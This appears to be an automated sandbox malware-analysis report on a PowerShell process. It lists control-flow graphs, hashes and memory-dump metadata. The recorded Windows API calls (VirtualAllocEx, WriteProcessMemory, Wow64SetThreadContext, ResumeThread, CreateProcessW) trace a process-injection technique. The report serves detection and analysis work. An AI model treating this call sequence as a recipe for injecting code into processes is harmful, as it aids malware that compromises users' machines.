74b18dc-74b18e8 760->764 767 74b18ec-74b18ee 763->767 764->767 767->732 772 74b18f4-74b18f6 767->772 773 74b1a94-74b1a96 769->773 770->773 774 74b18f8-74b18fe 772->774 775 74b1910-74b191b 772->775 773->748 778 74b1a98-74b1ab5 773->778 780 74b1902-74b190e 774->780 781 74b1900 774->781 776 74b192a-74b1936 775->776 777 74b191d-74b1920 775->777 782 74b1938-74b193a 776->782 783 74b1944-74b194b 776->783 777->776 787 74b1b1d-74b1b22 778->787 788 74b1ab7-74b1ac9 778->788 780->775 781->775 782->783 786 74b1952-74b1954 783->786 789 74b196c-74b19c3 786->789 790 74b1956-74b195c 786->790 787->788 788->748 791 74b195e 790->791 792 74b1960-74b1962 790->792 791->789 792->789
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2291298209
                                                                                                                  • Opcode ID: 55cf1c67bc69d59ed1b672fcd6b760a3df18188e0d13dfbfbcf90ea11d9aaa10
                                                                                                                  • Instruction ID: a419f11323fd6c824052a23f5023d1b5a337cca3e2a09c8194c219313eb92c64
                                                                                                                  • Opcode Fuzzy Hash: 55cf1c67bc69d59ed1b672fcd6b760a3df18188e0d13dfbfbcf90ea11d9aaa10
                                                                                                                  • Instruction Fuzzy Hash: 6331EDB5D0438EEFCB358E3584642EA7BE2BF42650F1988ABD8048B255D734CD45CB72

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 795 4639d43-4639d5d 796 4639d63-4639d6a 795->796 797 4639de4-4639deb 795->797 798 4639d70-4639d77 796->798 799 463a174 796->799 800 4639df1-4639df8 797->800 801 463a17b 797->801 798->797 802 4639d79-4639dcb VirtualAllocEx 798->802 799->801 803 4639dfe-4639e19 call 46385c8 800->803 804 463a0ed-463a157 800->804 805 463a182 801->805 806 4639dd4-4639dde 802->806 807 4639dcd-4639dd3 802->807 803->805 811 4639e1f-4639e26 803->811 812 463a189 805->812 806->797 807->806 814 463a0d3-463a0e6 811->814 815 4639e2c-4639e35 811->815 819 463a193 812->819 814->804 817 463a1b2-463a1ca 815->817 818 4639e3b-4639e41 815->818 840 463a1d1-463a1e7 817->840 818->817 820 4639e47-4639e52 818->820 824 463a19a 819->824 820->817 829 4639e58-4639e5e 820->829 830 463a1a1 824->830 831 4639f61-4639f72 829->831 832 4639e64-4639e69 829->832 836 463a1ab 830->836 831->817 839 4639f78-4639f8c call 46385c8 831->839 832->817 835 4639e6f-4639e82 832->835 835->817 843 4639e88-4639e9b 835->843 836->817 839->824 848 4639f92-4639f99 839->848 856 463a241-463a256 840->856 857 463a1e9-463a1f3 840->857 843->817 853 4639ea1-4639eb6 843->853 850 463a09f-463a0b2 848->850 851 4639f9f-4639fa5 848->851 880 463a0b9-463a0cc 850->880 851->817 855 4639fab-4639fbc 851->855 853->812 860 4639ebc-4639ec0 853->860 855->830 870 4639fc2-4639fc6 855->870 865 463a1f5-463a1fc 857->865 866 463a1fe-463a200 857->866 868 4639f47-4639f4a 860->868 869 4639ec6-4639ecf 860->869 871 463a202-463a206 865->871 866->871 868->817 876 4639f50-4639f53 868->876 869->817 872 4639ed5-4639ed8 869->872 874 4639fd1-4639fd9 870->874 875 4639fc8-4639fcb 870->875 878 463a208 call 4638a08 871->878 879 463a20d-463a21a 871->879 872->817 881 4639ede-4639f0e 872->881 874->817 882 4639fdf-4639fe9 874->882 875->874 876->817 877 4639f59-4639f5b 876->877 877->831 877->832 878->879 897 463a221-463a23e 879->897 898 463a21c 879->898 880->814 881->817 899 4639f14-4639f2d call 46385c8 881->899 882->840 883 4639fef-463a001 call 46385d4 882->883 883->836 891 463a007-463a00e 883->891 895 463a010-463a04e ResumeThread 891->895 896 463a06b-463a07e 891->896 900 463a050-463a056 895->900 901 463a057-463a064 895->901 905 463a085-463a098 896->905 898->897 906 4639f32-4639f34 899->906 900->901 904 463a066 901->904 901->905 904->898 905->850 906->819 908 4639f3a-4639f41 906->908 908->868 908->880
                                                                                                                  APIs
                                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04639DB4
                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0463A037
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocResumeThreadVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 234695336-0
                                                                                                                  • Opcode ID: 2a7e568b07463797ec0fc6c11dcbca9cb220350119bff49fdf34e6c688b2a5ba
                                                                                                                  • Instruction ID: c0d8fc94343b32725729e71d00f332ed20c7ac225877fa0a1f4d14cfb2eea3e0
                                                                                                                  • Opcode Fuzzy Hash: 2a7e568b07463797ec0fc6c11dcbca9cb220350119bff49fdf34e6c688b2a5ba
                                                                                                                  • Instruction Fuzzy Hash: E2819270A002588BEB24CF74DC48B99B7B2FF4434AF14C1A8D89897391EB70AE84DF51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 912 74b2770-74b2792 913 74b2798-74b279d 912->913 914 74b293c-74b295c 912->914 915 74b279f-74b27a5 913->915 916 74b27b5-74b27b9 913->916 922 74b295e-74b296c 914->922 923 74b29b6 914->923 917 74b27a9-74b27b3 915->917 918 74b27a7 915->918 920 74b27bf-74b27c3 916->920 921 74b28e4-74b28ee 916->921 917->916 918->916 924 74b2803 920->924 925 74b27c5-74b27d6 920->925 926 74b28fc-74b2902 921->926 927 74b28f0-74b28f9 921->927 931 74b296e-74b298b 922->931 932 74b29a5-74b29af 922->932 928 74b29b8-74b29be 923->928 929 74b2805-74b2807 924->929 925->914 944 74b27dc-74b27e1 925->944 933 74b2908-74b2914 926->933 934 74b2904-74b2906 926->934 935 74b29c0-74b29c2 928->935 936 74b29c4-74b29d0 928->936 929->921 937 74b280d-74b2811 929->937 949 74b298d-74b299f 931->949 950 74b29f5-74b29fa 931->950 932->928 940 74b29b1-74b29b5 932->940 939 74b2916-74b2939 933->939 934->939 941 74b29d2-74b29f2 935->941 936->941 937->921 942 74b2817-74b281b 937->942 942->921 948 74b2821-74b2847 942->948 951 74b27f9-74b2801 944->951 952 74b27e3-74b27e9 944->952 948->921 962 74b284d-74b2851 948->962 949->932 950->949 951->929 954 74b27eb 952->954 955 74b27ed-74b27f7 952->955 954->951 955->951 963 74b2853-74b285c 962->963 964 74b2874 962->964 966 74b285e-74b2861 963->966 967 74b2863-74b2870 963->967 965 74b2877-74b2884 964->965 970 74b288a-74b28e1 965->970 968 74b2872 966->968 967->968 968->965
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (o^q$(o^q
                                                                                                                  • API String ID: 0-1946778100
                                                                                                                  • Opcode ID: 24457db727b5b0ddbc9c6de6efc8fabc89bb5a4e695367e5ba92b80c6dd5b5f9
                                                                                                                  • Instruction ID: e21e9604e2cdee7fd419f3b6cb4692cfec6197b67b09fa0b314b98bf570d673d
                                                                                                                  • Opcode Fuzzy Hash: 24457db727b5b0ddbc9c6de6efc8fabc89bb5a4e695367e5ba92b80c6dd5b5f9
                                                                                                                  • Instruction Fuzzy Hash: 9C61F471B04309DFCB248E69C804BEB7BA6BB86310F14896BE5198B391CBB1CD95C771

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 972 74b0f20-74b0f32 973 74b0f38-74b0f49 972->973 974 74b0ff2-74b1074 972->974 977 74b0f4b-74b0f51 973->977 978 74b0f63-74b0f80 973->978 993 74b10a1-74b10a6 974->993 994 74b1076-74b1084 974->994 979 74b0f53 977->979 980 74b0f55-74b0f61 977->980 978->974 984 74b0f82-74b0fa4 978->984 979->978 980->978 988 74b0fbe-74b0fd6 984->988 989 74b0fa6-74b0fac 984->989 996 74b0fd8-74b0fda 988->996 997 74b0fe4-74b0fef 988->997 990 74b0fae 989->990 991 74b0fb0-74b0fbc 989->991 990->988 991->988 993->994 1001 74b108c-74b109b 994->1001 996->997 1001->993
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q
                                                                                                                  • API String ID: 0-309238000
                                                                                                                  • Opcode ID: a1c4e93f905315056269e802f62042fc8f7b744a12864bfebc5564a3778a6b27
                                                                                                                  • Instruction ID: 39f5a4cfb22b4dcacfd327a61c6a2a4e9f9cc2e1405fc0f9cc1b576faba1df39
                                                                                                                  • Opcode Fuzzy Hash: a1c4e93f905315056269e802f62042fc8f7b744a12864bfebc5564a3778a6b27
                                                                                                                  • Instruction Fuzzy Hash: 5C412770B053886FC7215B688854BAABFE5AF86B00F14849BE444DF3D6CA71AC45C3B2

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1002 74b24bf-74b24d7 1004 74b24de-74b24e0 1002->1004 1005 74b24f8-74b254f 1004->1005 1006 74b24e2-74b24e8 1004->1006 1007 74b24ea 1006->1007 1008 74b24ec-74b24ee 1006->1008 1007->1005 1008->1005
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                  • API String ID: 0-2697143702
                                                                                                                  • Opcode ID: 10aad8ea58ef0ef0d0aa0d2cfe4f70ffd9e1f1c7143cc88c7d34ace07be28eb3
                                                                                                                  • Instruction ID: 8996aacedeaa9314afabdc8fb5b893f85aeb502bf7c1638afca048f2e9631201
                                                                                                                  • Opcode Fuzzy Hash: 10aad8ea58ef0ef0d0aa0d2cfe4f70ffd9e1f1c7143cc88c7d34ace07be28eb3
                                                                                                                  • Instruction Fuzzy Hash: F1E0D871B842894EDB2C6668A5642E97BA17FD3550F104CABC4408B259CB218C499372

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1010 46385a4-463a2d1 1012 463a2d3-463a2d6 1010->1012 1013 463a2d9-463a2e0 1010->1013 1012->1013 1014 463a2e2-463a2e8 1013->1014 1015 463a2eb-463a301 1013->1015 1014->1015 1016 463a303-463a309 1015->1016 1017 463a30c-463a3af CreateProcessW 1015->1017 1016->1017 1019 463a3b1-463a3b7 1017->1019 1020 463a3b8-463a430 1017->1020 1019->1020 1027 463a442-463a449 1020->1027 1028 463a432-463a438 1020->1028 1029 463a460 1027->1029 1030 463a44b-463a45a 1027->1030 1028->1027 1032 463a461 1029->1032 1030->1029 1032->1032
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72AC10FC,?), ref: 0463A39C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: 13a3143838834531d3816ce968efe3422c7a239aa31ec487e0aa5c99506af41b
                                                                                                                  • Instruction ID: 3a55afdbb843513a56c10bd6108a0bf88342124c9158507b3e49268888360a13
                                                                                                                  • Opcode Fuzzy Hash: 13a3143838834531d3816ce968efe3422c7a239aa31ec487e0aa5c99506af41b
                                                                                                                  • Instruction Fuzzy Hash: DD514871901259DFDB24CF99C944BDEBBB5FF48304F0480AAE909B7250EB75AA84DF90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1033 463a257-463a2d1 1035 463a2d3-463a2d6 1033->1035 1036 463a2d9-463a2e0 1033->1036 1035->1036 1037 463a2e2-463a2e8 1036->1037 1038 463a2eb-463a301 1036->1038 1037->1038 1039 463a303-463a309 1038->1039 1040 463a30c-463a3af CreateProcessW 1038->1040 1039->1040 1042 463a3b1-463a3b7 1040->1042 1043 463a3b8-463a430 1040->1043 1042->1043 1050 463a442-463a449 1043->1050 1051 463a432-463a438 1043->1051 1052 463a460 1050->1052 1053 463a44b-463a45a 1050->1053 1051->1050 1055 463a461 1052->1055 1053->1052 1055->1055
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72AC10FC,?), ref: 0463A39C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: 1248c745bd5c59f1358a85bde113ba4649dd0ff0511dfd15d05a65c82d7d628a
                                                                                                                  • Instruction ID: 9237bb0c984a88d99847a1cef7aa3d843848a50a990935b818e989d656879300
                                                                                                                  • Opcode Fuzzy Hash: 1248c745bd5c59f1358a85bde113ba4649dd0ff0511dfd15d05a65c82d7d628a
                                                                                                                  • Instruction Fuzzy Hash: A9515871901259DFDB24CF99C940BDEBBB5BF48304F0480AAE909B7250EB35AA84CF90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1056 46385c8-463a656 1058 463a660-463a699 WriteProcessMemory 1056->1058 1059 463a658-463a65e 1056->1059 1060 463a6a2-463a6c3 1058->1060 1061 463a69b-463a6a1 1058->1061 1059->1058 1061->1060
                                                                                                                  APIs
                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18672514,00000000,?,?,?,00000000,00000000,?,04639E17,?,00000000,?), ref: 0463A68C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3559483778-0
                                                                                                                  • Opcode ID: b67997a72bb0d06e4511f87e6e8e1897e4bce605d4fb017408305bdd4e5bea4b
                                                                                                                  • Instruction ID: 89dacfeefd325d9188e3881b582ce8c07b67639810b0cd33471791dfad9d8496
                                                                                                                  • Opcode Fuzzy Hash: b67997a72bb0d06e4511f87e6e8e1897e4bce605d4fb017408305bdd4e5bea4b
                                                                                                                  • Instruction Fuzzy Hash: 2D2107B1900359DFDB10CF9AC884BDEBBF8FB09320F10842AE558A7210D378A944DFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1063 463a60f-463a656 1065 463a660-463a699 WriteProcessMemory 1063->1065 1066 463a658-463a65e 1063->1066 1067 463a6a2-463a6c3 1065->1067 1068 463a69b-463a6a1 1065->1068 1066->1065 1068->1067
                                                                                                                  APIs
                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18672514,00000000,?,?,?,00000000,00000000,?,04639E17,?,00000000,?), ref: 0463A68C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3559483778-0
                                                                                                                  • Opcode ID: 4946a2aff4839645b2181f370e7021076293ff92f903e93ed4ca3821fbe04418
                                                                                                                  • Instruction ID: dfa193ca2a0edb5bb2439acb62758ab308750f81a714e6012cfdcd081b85a9ac
                                                                                                                  • Opcode Fuzzy Hash: 4946a2aff4839645b2181f370e7021076293ff92f903e93ed4ca3821fbe04418
                                                                                                                  • Instruction Fuzzy Hash: A72118B5900359DFDB10CF9AC885BDEBBF8FB08320F10842AE558A7210D378A944CFA5
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04639BCB), ref: 0463A503
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: 6d473198c340d6b28391cae69d186e5dc85b4d27602ab1374a7eb0e232d14b7f
                                                                                                                  • Instruction ID: 7a41339b3b62a5402b566874d1604ad9b5236de54d6dd1c23c56502c6945b38d
                                                                                                                  • Opcode Fuzzy Hash: 6d473198c340d6b28391cae69d186e5dc85b4d27602ab1374a7eb0e232d14b7f
                                                                                                                  • Instruction Fuzzy Hash: 0C1126B19003498FDB10CF9AC944BDEBBF4EB88320F14C42AE458A7601E778A545CFA5
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04639BCB), ref: 0463A503
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: 127fcb286dcbf2bb4138abcf7ccd5757283661ee59fd312bba8c691043b44b6a
                                                                                                                  • Instruction ID: 57008b0bd9be944f7130057e4891e9a9fd2ebaa9351d1f50badcbfdad9986b93
                                                                                                                  • Opcode Fuzzy Hash: 127fcb286dcbf2bb4138abcf7ccd5757283661ee59fd312bba8c691043b44b6a
                                                                                                                  • Instruction Fuzzy Hash: 9C1126B19003498FDB10CF9AC944BDEBBF4EB88320F14C42AE458A7601E778A945CFA5
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04639BCB), ref: 0463A503
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: a04248db32752f3b36e5f71e91050d2be28cd0d2c08dbc3c700889421df52875
                                                                                                                  • Instruction ID: 4e476540cd73cfaab265d85de31f72a061c01b50ae2ed722559bcb3ea136436a
                                                                                                                  • Opcode Fuzzy Hash: a04248db32752f3b36e5f71e91050d2be28cd0d2c08dbc3c700889421df52875
                                                                                                                  • Instruction Fuzzy Hash: C51107B5D002498FDB10CF9AD845BDEFBF4EB88324F14842AD458A7640D778A545CFA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (o^q
                                                                                                                  • API String ID: 0-74704288
                                                                                                                  • Opcode ID: 675bb27373b82ca05f1c16b641def69a8c65298e1a021d70a39783b55f24b4ff
                                                                                                                  • Instruction ID: 73e6399ea7dd1e9ecfd8d4645d1e3e40e1a3466580bac2886227159db71cba30
                                                                                                                  • Opcode Fuzzy Hash: 675bb27373b82ca05f1c16b641def69a8c65298e1a021d70a39783b55f24b4ff
                                                                                                                  • Instruction Fuzzy Hash: 6931C4B0A0020ADFDB78CE19C844BEB7BA5BB45714F04866BE4188B2A0D7F0DD95CB75
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950333513.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_cfd000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d0a34a97da23b22c98b1ef2a4cbdd765f32edd64fd7ae5d95c469fbfee5c7a17
                                                                                                                  • Instruction ID: bb3371fac222663078757924fce1d0ccaed6843489dc4649fdd0a534b28f2dc2
                                                                                                                  • Opcode Fuzzy Hash: d0a34a97da23b22c98b1ef2a4cbdd765f32edd64fd7ae5d95c469fbfee5c7a17
                                                                                                                  • Instruction Fuzzy Hash: 9001807100E3C09ED7128B258894762BFB4DF53224F0DC0DBD9888F1A3C6695849C772
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950333513.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_cfd000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c6b2210d4c9bf31713172f4c92286d7b4b9d1cd3aa2222fbf937d8d0011e39c1
                                                                                                                  • Instruction ID: 4baf62a7a1227c09f73c8a584f873ca1616e3608823ca1463cffa097c114113c
                                                                                                                  • Opcode Fuzzy Hash: c6b2210d4c9bf31713172f4c92286d7b4b9d1cd3aa2222fbf937d8d0011e39c1
                                                                                                                  • Instruction Fuzzy Hash: 41012B710093089AE7508B26CDC4777BF98DF41324F18C52AEE1A4B146CA79D981C6B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3a47b4892e3641856adc48c2f849ab04a5942366752de4150691fc172d525b44
                                                                                                                  • Instruction ID: e440933ddc84b8f5f02d52169dd1df39c17cf522940ea5d979bcb758b6b1a58b
                                                                                                                  • Opcode Fuzzy Hash: 3a47b4892e3641856adc48c2f849ab04a5942366752de4150691fc172d525b44
                                                                                                                  • Instruction Fuzzy Hash: 80012E6160E3C48FCB130B7488A10A03F719E6320074A84EBD6C1CF2EBE4689C8AC773
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_4630000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Xbq$$^q
                                                                                                                  • API String ID: 0-1593437937
                                                                                                                  • Opcode ID: 0df72a02dbd16c2b81d9f07568ed9304c744e8727e9c71dfc066fa82958987bb
                                                                                                                  • Instruction ID: 218e8cf4a6c2159499f59fa614858be9642ff96ced5326cffec971709e939ae5
                                                                                                                  • Opcode Fuzzy Hash: 0df72a02dbd16c2b81d9f07568ed9304c744e8727e9c71dfc066fa82958987bb
                                                                                                                  • Instruction Fuzzy Hash: C3D10B71F042998FDB199B78985027EBBB2BFC5301F05486ED486D7285EF349C0A8B91
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-3272787073
                                                                                                                  • Opcode ID: a9a083fedfbfe6f7fe55e05a90bc1973cc8f608313608935324ec3f387197e64
                                                                                                                  • Instruction ID: 3f1e1076d2b9dad15e247797efc306fb970a8884c41f58337eaf9dc46fec7e13
                                                                                                                  • Opcode Fuzzy Hash: a9a083fedfbfe6f7fe55e05a90bc1973cc8f608313608935324ec3f387197e64
                                                                                                                  • Instruction Fuzzy Hash: B041E5B1B4420ECFC7349B6C84246E7BBE6AF85611F1484BBC506CB345EA31DC86C7A1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2049395529
                                                                                                                  • Opcode ID: 9602e0b0cce318bc2eca4db324332acd0c2a59fd595b7e2fb7ce86e9baf177f1
                                                                                                                  • Instruction ID: 277f1334f6b017810ce17de1b2b7c5912a1f822abe4584a029b042bdb9fb9611
                                                                                                                  • Opcode Fuzzy Hash: 9602e0b0cce318bc2eca4db324332acd0c2a59fd595b7e2fb7ce86e9baf177f1
                                                                                                                  • Instruction Fuzzy Hash: 9001F221B093858FC73A122828345E72FB66FC391132944DBD080DF3A7CE258C8A83B2

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:31.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:4.4%
                                                                                                                  Total number of Nodes:1847
                                                                                                                  Total number of Limit Nodes:92
